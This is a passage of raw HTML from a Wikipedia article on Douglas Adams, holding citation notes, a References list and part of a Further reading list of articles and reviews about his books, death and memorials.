Retrieved <span class=\"nowrap\">10 July</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=So+long%2C+Douglas+Adams%2C+and+thanks+for+all+the+fun&rft.aufirst=David&rft.aulast=Cassel&rft.date=2001-05-15&rft.genre=unknown&rft_id=http%3A%2F%2Farchive.salon.com%2Ftech%2Ffeature%2F2001%2F05%2F15%2Fdouglas_adams%2Findex.html&rft.jtitle=Salon&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-IPP-52\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-IPP_52-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-IPP_52-1\"><sup><i><b>b</b></i></sup></a> <a href=\"#cite_ref-IPP_52-2\"><sup><i><b>c</b></i></sup></a></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://web.archive.org/web/20120318001614/http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp\">\"Islington People's Plaques\"</a>. 25 July 2011. Archived from <a rel=\"nofollow\" class=\"external text\" href=\"http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp\">the original</a> on 18 March 2012<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">13 August</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Islington+People%27s+Plaques&rft.date=2011-07-25&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.islington.gov.uk%2FLeisure%2Fheritage%2Fheritage_borough%2Fbor_plaques%2Fpeoplesplaques.asp&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-sfweekly-53\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-sfweekly_53-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Bowers, Keith (6 July 2011). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.sfweekly.com/2011-07-06/calendar/big-three/\">\"Big Three\"</a>. <i>SF Weekly</i>. <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mSWp8yr?url=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">8 December</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Big+Three&rft.aufirst=Keith&rft.aulast=Bowers&rft.date=2011-07-06&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F&rft.jtitle=SF+Weekly&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-54\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-54\">^</a></b></span> <span class=\"reference-text\">Webb, Chapter 10.</span></li>\n<li id=\"cite_note-timesobit-55\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-timesobit_55-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://announcements.thetimes.co.uk/obituaries/timesonline-uk/obituary.aspx?page=lifestory&pid=153521790\">\"Obituary & Guest Book Preview for Jane Elizabeth BELSON\"</a>. <i>The Times</i>. 9 September 2011. <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mSoMnJe\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">8 December</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Obituary+%26+Guest+Book+Preview+for+Jane+Elizabeth+BELSON&rft.date=2011-09-09&rft.genre=unknown&rft_id=http%3A%2F%2Fannouncements.thetimes.co.uk%2Fobituaries%2Ftimesonline-uk%2Fobituary.aspx%3Fpage%3Dlifestory%26pid%3D153521790&rft.jtitle=The+Times&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-h2g2obit-56\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-h2g2obit_56-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://lifednah2g2.blogspot.com/2011/09/jane-belson-douglas-adams-widow-passed.html\">\"Jane Belson, Douglas Adams's widow, passed away\"</a>. <i>h2g2</i><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">9 July</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Jane+Belson%2C+Douglas+Adams%27s+widow%2C+passed+away&rft.genre=unknown&rft_id=http%3A%2F%2Flifednah2g2.blogspot.com%2F2011%2F09%2Fjane-belson-douglas-adams-widow-passed.html&rft.jtitle=h2g2&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-57\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-57\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Lewis, Judith; Shulman, Dave (24 May 2001). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.laweekly.com/2001-05-24/news/lots-of-screamingly-funny-sentences-no-fish/\">\"Lots of Screamingly Funny Sentences. No Fish. – page 1\"</a>. LA Weekly. 
<a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mQ1aCJQ?url=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F\">Archived</a> from the original on 24 May 2001<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">20 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Judith&rft.aulast=Lewis&rft.au=Shulman%2C+Dave&rft.btitle=Lots+of+Screamingly+Funny+Sentences.+No+Fish.+%93+page+1&rft.date=2001-05-24&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F&rft.pub=LA+Weekly&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Simpson_337-338-58\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_337-338_58-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 337–338</span></li>\n<li id=\"cite_note-59\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-59\">^</a></b></span> <span class=\"reference-text\">Gaiman, 204.</span></li>\n<li id=\"cite_note-60\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-60\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.bbc.co.uk/cult/hitchhikers/celebration/\">\"BBC Online – Cult – Hitchhiker's – Douglas Adams – Service of Celebration\"</a>. BBC. 17 September 2001<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=BBC+Online+%93+Cult+%93+Hitchhiker%27s+%93+Douglas+Adams+%93+Service+of+Celebration&rft.date=2001-09-17&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.bbc.co.uk%2Fcult%2Fhitchhikers%2Fcelebration%2F&rft.pub=BBC&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-61\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-61\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=_ZG8HBuDjgc\">\"Parrots, the universe and everything, recorded May 2001\"</a>. YouTube<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Parrots%2C+the+universe+and+everything%2C+recorded+May+2001&rft.genre=unknown&rft_id=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D_ZG8HBuDjgc&rft.pub=YouTube&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-62\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-62\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://navarroj.com/parrots\">\"Transcript of \"Parrots, the Universe and Everything<span style=\"padding-right:0.2em;\">\"</span>\"</a>. Navarroj.com<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">27 July</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Transcript+of+%22Parrots%2C+the+Universe+and+Everything%22&rft.genre=unknown&rft_id=http%3A%2F%2Fnavarroj.com%2Fparrots&rft.pub=Navarroj.com&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-MPC42677-63\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-MPC42677_63-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.minorplanetcenter.net/iau/ECS/MPCArchive/2001/MPC_20010509.pdf\">\"New Names of Minor Planets\"</a> <span style=\"font-size:85%;\">(PDF)</span>, <i><a href=\"/wiki/Minor_Planet_Circular\" class=\"mw-redirect\" title=\"Minor Planet Circular\">Minor Planet Circular</a></i>, Cambridge, Mass: <a href=\"/wiki/Minor_Planet_Center\" title=\"Minor Planet Center\">Minor Planet Center</a> (MPC 42677), 9 May 2001, <a href=\"/wiki/International_Standard_Serial_Number\" title=\"International Standard Serial Number\">ISSN</a> <a rel=\"nofollow\" class=\"external text\" href=\"//www.worldcat.org/issn/0736-6884\">0736-6884</a></cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=New+Names+of+Minor+Planets&rft.date=2001-05-09&rft.genre=article&rft_id=http%3A%2F%2Fwww.minorplanetcenter.net%2Fiau%2FECS%2FMPCArchive%2F2001%2FMPC_20010509.pdf&rft.issn=0736-6884&rft.issue=MPC+42677&rft.jtitle=Minor+Planet+Circular&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-64\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-64\">^</a></b></span> <span class=\"reference-text\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.msnbc.msn.com/id/6867061/\">Asteroid named after 
'Hitchhiker' humorist: Late British sci-fi author honored after cosmic campaign</a> by Alan Boyle, MSNBC, 25 January 2005</span></li>\n<li id=\"cite_note-65\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-65\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">Murray, Charles Shaar (10 May 2002). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.independent.co.uk/arts-entertainment/books/reviews/the-salmon-of-doubt-by-douglas-adams-650803.html\">\"The Salmon of Doubt by Douglas Adams\"</a>. <i>The Independent</i>. London<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">2 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=The+Salmon+of+Doubt+by+Douglas+Adams&rft.aufirst=Charles+Shaar&rft.aulast=Murray&rft.date=2002-05-10&rft.genre=article&rft_id=http%3A%2F%2Fwww.independent.co.uk%2Farts-entertainment%2Fbooks%2Freviews%2Fthe-salmon-of-doubt-by-douglas-adams-650803.html&rft.jtitle=The+Independent&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-66\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-66\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">The Literator (5 January 2002). <a rel=\"nofollow\" class=\"external text\" href=\"https://web.archive.org/web/20090801062359/http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\">\"Cover Stories: Douglas Adams, Narnia Chronicles, Something like a House\"</a>. <i>The Independent</i>. London. 
Archived from <a rel=\"nofollow\" class=\"external text\" href=\"http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\">the original</a> on 1 August 2009<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">2 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Cover+Stories%3A+Douglas+Adams%2C+Narnia+Chronicles%2C+Something+like+a+House&rft.au=The+Literator&rft.date=2002-01-05&rft.genre=article&rft_id=http%3A%2F%2Fwww.independent.co.uk%2Farts-entertainment%2Fbooks%2Ffeatures%2Fcover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html&rft.jtitle=The+Independent&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-67\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-67\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.dirkmaggs.dswilliams.co.uk/Dirk%20Maggs%20News%20%20new%20projects.htm\">\"Dirk Maggs News and New Projects page\"</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Dirk+Maggs+News+and+New+Projects+page&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.dirkmaggs.dswilliams.co.uk%2FDirk%2520Maggs%2520News%2520%2520new%2520projects.htm&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span><sup class=\"noprint Inline-Template\"><span style=\"white-space: nowrap;\">[<i><a href=\"/wiki/Wikipedia:Link_rot\" title=\"Wikipedia:Link rot\"><span title=\" Dead link since June 2016\">dead link</span></a></i>]</span></sup></span></li>\n<li id=\"cite_note-68\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-68\">^</a></b></span> <span 
class=\"reference-text\"><cite class=\"citation web\">Matthew Hemley (5 May 2009). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.thestage.co.uk/news/newsstory.php/24312/douglas-adams-final-dirk-gently-novel-to-be\">\"The Stage / News / Douglas Adams's final Dirk Gently novel to be adapted for Radio 4\"</a>. <i>The Stage</i><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">20 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=The+Stage+%2F+News+%2F+Douglas+Adams%27s+final+Dirk+Gently+novel+to+be+adapted+for+Radio+4&rft.au=Matthew+Hemley&rft.date=2009-05-05&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.thestage.co.uk%2Fnews%2Fnewsstory.php%2F24312%2Fdouglas-adams-final-dirk-gently-novel-to-be&rft.jtitle=The+Stage&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-69\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-69\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.chortle.co.uk/news/2009/10/11/9767/bbc_plans_dirk_gently_tv_series\">\"BBC plans Dirk Gently TV series\"</a>. Chortle.co.uk. 11 October 2009<span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">11 October</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=BBC+plans+Dirk+Gently+TV+series&rft.date=2009-10-11&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.chortle.co.uk%2Fnews%2F2009%2F10%2F11%2F9767%2Fbbc_plans_dirk_gently_tv_series&rft.pub=Chortle.co.uk&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-GoogleDoodle2013a-70\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-GoogleDoodle2013a_70-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\"><a rel=\"nofollow\" class=\"external text\" href=\"http://abcnews.go.com/blogs/technology/2013/03/dont-panic-google-doodle-honors-author-douglas-adams/\">\"Don't Panic! Google Doodle Honors Author Douglas Adams\"</a>. <i>abc News</i>. 11 March 2013<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Don%27t+Panic%21+Google+Doodle+Honors+Author+Douglas+Adams&rft.date=2013-03-11&rft.genre=article&rft_id=http%3A%2F%2Fabcnews.go.com%2Fblogs%2Ftechnology%2F2013%2F03%2Fdont-panic-google-doodle-honors-author-douglas-adams%2F&rft.jtitle=abc+News&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-71\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-71\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.google.com/doodles/douglas-adams-61st-birthday\">\"Douglas Adams' 61st Birthday\"</a><span class=\"reference-accessdate\">. 
Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams%27+61st+Birthday&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.google.com%2Fdoodles%2Fdouglas-adams-61st-birthday&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n</ol>\n</div>\n<h2><span class=\"mw-headline\" id=\"References\">References</span></h2>\n<ul>\n<li>Adams, Douglas (1998). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.biota.org/people/douglasadams/\">Is there an Artificial God?</a>, speech at <i>Digital Biota 2</i>, Cambridge, England, September 1998.</li>\n<li><cite id=\"CITEREFAdams2002\" class=\"citation book\">Adams, Douglas (2002). <i>The Salmon of Doubt: Hitchhiking the Galaxy One Last Time</i>. London: Macmillan. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-333-76657-1\" title=\"Special:BookSources/0-333-76657-1\">0-333-76657-1</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Douglas&rft.aulast=Adams&rft.btitle=The+Salmon+of+Doubt%3A+Hitchhiking+the+Galaxy+One+Last+Time&rft.date=2002&rft.genre=book&rft.isbn=0-333-76657-1&rft.place=London&rft.pub=Macmillan&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></li>\n<li>Dawkins, Richard (2003). \"Eulogy for Douglas Adams,\" in <i>A devil's chaplain: reflections on hope, lies, science, and love</i>. Houghton Mifflin Harcourt.</li>\n<li>Felch, Laura (2004). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.bookslut.com/nonfiction/2004_05_002057.php\">Don't Panic: Douglas Adams and the Hitchhiker's Guide to the Galaxy by Neil Gaiman</a>, May 2004</li>\n<li>Ray, Mohit K (2007). 
<i>Atlantic Companion to Literature in English</i>, Atlantic Publishers and Distributors. <a href=\"/wiki/Special:BookSources/8126908327\" class=\"internal mw-magiclink-isbn\">ISBN 81-269-0832-7</a></li>\n<li><cite id=\"CITEREFSimpson2003\" class=\"citation book\">Simpson, M. J. (2003). <i><a href=\"/w/index.php?title=Hitchhiker:_A_Biography_of_Douglas_Adams&action=edit&redlink=1\" class=\"new\" title=\"Hitchhiker: A Biography of Douglas Adams (page does not exist)\">Hitchhiker: A Biography of Douglas Adams</a></i> (1st ed.). Boston, Mass.: Justin, Charles & Co. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/1-932112-17-0\" title=\"Special:BookSources/1-932112-17-0\">1-932112-17-0</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=M.+J.&rft.aulast=Simpson&rft.btitle=Hitchhiker%3A+A+Biography+of+Douglas+Adams&rft.date=2003&rft.edition=1st&rft.genre=book&rft.isbn=1-932112-17-0&rft.place=Boston%2C+Mass.&rft.pub=Justin%2C+Charles+%26+Co&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></li>\n<li>Webb, Nick (2005a). <i>Wish You Were Here: The Official Biography of Douglas Adams</i>. Ballantine Books. <a href=\"/wiki/Special:BookSources/0345476506\" class=\"internal mw-magiclink-isbn\">ISBN 0-345-47650-6</a></li>\n<li>Webb, Nick (2005b). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.oxforddnb.com/view/article/75853\">\"Adams, Douglas Noël (1952–2001)\"</a>, <i>Oxford Dictionary of National Biography</i>, Oxford University Press, January 2005. 
Retrieved 25 October 2005.</li>\n</ul>\n<h2><span class=\"mw-headline\" id=\"Further_reading\">Further reading</span></h2>\n<h3><span class=\"mw-headline\" id=\"Articles\">Articles</span></h3>\n<div class=\"refbegin columns references-column-width\" style=\"-moz-column-width: 30em; -webkit-column-width: 30em; column-width: 30em;\">\n<ul>\n<li>Herbert, R. (1980). The Hitchhiker's Guide to the Galaxy (Book Review). Library Journal, 105(16), 1982.</li>\n<li>Adams, J., & Brown, R. (1981). The Hitchhiker's Guide to the Galaxy (Book Review). School Library Journal, 27(5), 74.</li>\n<li>Nickerson, S. L. (1982). The Restaurant at the End of the Universe (Book). Library Journal, 107(4), 476.</li>\n<li>Nickerson, S. L. (1982). Life, the Universe, and Everything (Book). Library Journal, 107(18), 2007.</li>\n<li>Morner, C. (1982). The Restaurant at the End of the Universe (Book Review). School Library Journal, 28(8), 87.</li>\n<li>Morner, C. (1983). Life, the Universe and Everything (Book Review). School Library Journal, 29(6), 93.</li>\n<li>Shorb, B. (1985). So Long, and Thanks for All the Fish (Book). School Library Journal, 31(6), 90.</li>\n<li>The Long Dark Tea-Time of the Soul (Book). (1989). Atlantic, 263(4), 99.</li>\n<li>Hoffert, B., & Quinn, J. (1990). Last Chance To See (Book). Library Journal, 115(16), 77.</li>\n<li>Reed, S. S., & Cook, I. I. (1991). Dances with kakapos. People, 35(19), 79.</li>\n<li>Last Chance to See (Book). (1991). Science News, 139(8), 126.</li>\n<li>Field, M. M., & Steinberg, S. S. (1991). Douglas Adams. Publishers Weekly, 238(6), 62.</li>\n<li>Dieter, W. (1991). Last Chance to See (Book). Smithsonian, 22(3), 140.</li>\n<li>Dykhuis, R. (1991). Last Chance To See (Book). Library Journal, 116(1), 140.</li>\n<li>Beatty, J. (1991). Good Show (Book). Atlantic, 267(3), 131.</li>\n<li>A guide to the future. (1992). Maclean's, 106(44), 51.</li>\n<li>Zinsser, J. (1993). Audio reviews: Fiction. 
Publishers Weekly, 240(9), 24.</li>\n<li>Taylor, B., & Annichiarico, M. (1993). Audio reviews. Library Journal, 118(2), 132.</li>\n<li>Good reads. (1995). NetGuide, 2(4), 109.</li>\n<li>Stone, B. (1998). The unsinkable starship. Newsweek, 131(15), 78.</li>\n<li>Gaslin, G. (2001). Galaxy Quest. Entertainment Weekly, (599), 79.</li>\n<li>So long, and thanks for all the fish. (2001). Economist, 359(8222), 79.</li>\n<li>Geier, T., & Raftery, B. M. (2001). Legacy. Entertainment Weekly, (597), 11.</li>\n<li>Passages. (2001). Maclean's, 114(21), 13.</li>\n<li>Don't panic! Douglas Adams to keynote Embedded show. (2001). Embedded Systems Programming, 14(3), 10.</li>\n<li>Ehrenman, G. (2001). World Wide Weird. InternetWeek, (862), 15.</li>\n<li>Zaleski, J. (2002). The Salmon of Doubt (Book). Publishers Weekly, 249(15), 43.</li>\n<li>Mort, J. (2002). The Salmon of Doubt (Book). Booklist, 98(16), 1386.</li>\n<li>Lewis, D. L. (2002). Last Time Round The Galaxy. Quadrant Magazine, 46(9), 84.</li>\n<li>Burns, A. (2002). The Salmon of Doubt (Book). Library Journal, 127(15), 111.</li>\n<li>Burns, A., & Rhodes, B. (2002). The Restaurant at the End of the Universe (Book). Library Journal, 127(19), 118.</li>\n<li>Kaveney, R. (2002). A cheerful whale. TLS, (5173), 23.</li>\n<li>Pearl, N., & Welch, R. (2003). The Hitchhiker's Guide To The Galaxy (Book). Library Journal, 128(11), 124.</li>\n<li>Preying on composite materials. (2003). R&D Magazine, 45(6), 44.</li>\n<li>Webb, N. (2003). The Berkeley Hotel hostage. Bookseller, (5069), 25.</li>\n<li>The author who toured the universe. (2003). Bookseller, (5060), 35.</li>\n<li>Osmond, A. (2005). Only human. Sight & Sound, 15(5), 12–15.</li>\n<li>Culture vulture. (2005). Times Educational Supplement, (4640), 19.</li>\n<li>Maughan, S. (2005). Audio Bestsellers/Fiction. Publishers Weekly, 252(30), 17.</li>\n<li>Hitchhiker At The Science Museum. (2005). In Britain, 14(10), 9.</li>\n<li>Rea, A. (2005). The Adams asteroids. 
New Scientist, 185(2488), 31.</li>\n<li>Most Improbable Adventure. (2005). Popular Mechanics, 182(5), 32.</li>\n<li>The Hitchhiker's Guide To The Galaxy: The Tertiary Phase. (2005). Publishers Weekly, 252(14), 21.</li>\n<li>Bartelt, K. R. (2005). Wish You Were Here: The Official Biography of Douglas Adams. Library Journal, 130(4), 86.</li>\n<li>Larsen, D. (2005). I was a teenage android. New Zealand Listener, 198(3390), 37–38.</li>\n<li>Tanner, J. C. (2005). Simplicity: it's hard. Telecom Asia, 16(6), 6.</li>\n<li>Nielsen Bookscan Charts. (2005). Bookseller, (5175), 18–21.</li>\n<li>Buena Vista launches regional site to push Hitchhiker's movie. (2005). New Media Age, 9.</li>\n<li>Shynola bring Beckland to life. (2005). Creative Review, 25(3), 24–26.</li>\n<li>Carwardine, M. (15 September 2007). The baiji: So long and thanks for all the fish. New Scientist. pp. 50–53.</li>\n<li>Czarniawska, B. (2008). Accounting and gender across times and places: An excursion into fiction. Accounting, Organizations & Society, 33(1), 33–47.</li>\n<li>Pope, M. (2008). Life, the Universe, Religion and Science. Issues, (82), 31–34.</li>\n<li>Bearne, S. (2008). BBC builds site to trail Last Chance To See TV series. New Media Age, 8.</li>\n<li>Arrow to reissue Adams. (2008). Bookseller, (5352), 14.</li>\n<li>Page, B. (2008). Colfer is new Hitchhiker. Bookseller, (5350), 7.</li>\n<li>I've got a perfect puzzle for you. (2009). Bookseller, (5404), 42.</li>\n<li>Mostly Harmless.... (2009). Bookseller, (5374), 46.</li>\n<li>Penguin and PanMac hitch a ride together. (2009). Bookseller, (5373), 6.</li>\n<li>Adams, Douglas. Britannica Biographies [serial online]. October 2010, 1.</li>\n<li>Douglas (Noël) Adams (1952–2001). Hutchinson's Biography Database [serial online]. July 2011, 1.</li>\n<li>My life in books. (2011). 
